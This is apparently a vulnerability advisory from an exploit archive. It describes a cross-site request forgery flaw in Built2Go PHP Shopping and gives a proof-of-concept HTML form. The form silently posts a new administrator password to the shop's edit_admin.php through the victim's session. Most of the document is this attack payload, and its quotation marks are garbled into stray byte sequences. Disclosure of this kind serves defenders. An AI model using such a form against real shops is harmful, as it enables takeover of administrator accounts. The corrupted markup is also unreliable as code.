Built2Go PHP Shopping - Cross-Site Request Forgery (Admin Password)

source: https://www.securityfocus.com/bid/64735/info

Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.

Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers.

<form method=�0�9?�0�9POST�0�9?�0�9 name=�0�9?�0�9form0? action=�0�9?�0�9 http://www.example.com/adminpanel/edit_admin.php�0�9?�0�9>
<input type=�0�9?�0�9hidden�0�9?�0�9 name=�0�9?�0�9userid�0�9?�0�9 value=�0�9?�0�9ADMIN�0�9?�0�9/>
<input type=�0�9?�0�9hidden�0�9?�0�9 name=�0�9?�0�9pass�0�9?�0�9 value=�0�9?�0�912121212?/>
<input type=�0�9?�0�9hidden�0�9?�0�9 name=�0�9?�0�9retypepass�0�9?�0�9 value=�0�9?�0�912121212?/>
<input type=�0�9?�0�9hidden�0�9?�0�9 name=�0�9?�0�9addnew�0�9?�0�9 value=�0�9?�0�91?/>
<input type=�0�9?�0�9hidden�0�9?�0�9 name=�0�9?�0�9action�0�9?�0�9 value=�0�9?�0�9save�0�9?�0�9/>
<input type=�0�9?�0�9hidden�0�9?�0�9 name=�0�9?�0�9new�0�9?�0�9 value=�0�9?�0�9Submit�0�9?�0�9/>
</form>